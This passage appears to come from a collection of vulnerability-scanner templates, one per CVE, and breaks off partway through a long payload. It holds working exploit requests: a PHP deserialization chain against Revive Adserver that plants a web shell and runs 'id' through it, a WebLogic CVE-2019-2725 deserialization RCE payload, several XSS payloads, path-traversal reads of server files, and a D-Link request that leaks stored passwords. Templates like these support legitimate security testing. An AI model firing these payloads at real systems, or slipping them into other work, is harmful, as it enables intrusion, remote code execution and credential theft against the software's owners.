<param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>14</byte></void><void index=\"516\"><byte>29</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>-70</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>-72</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void 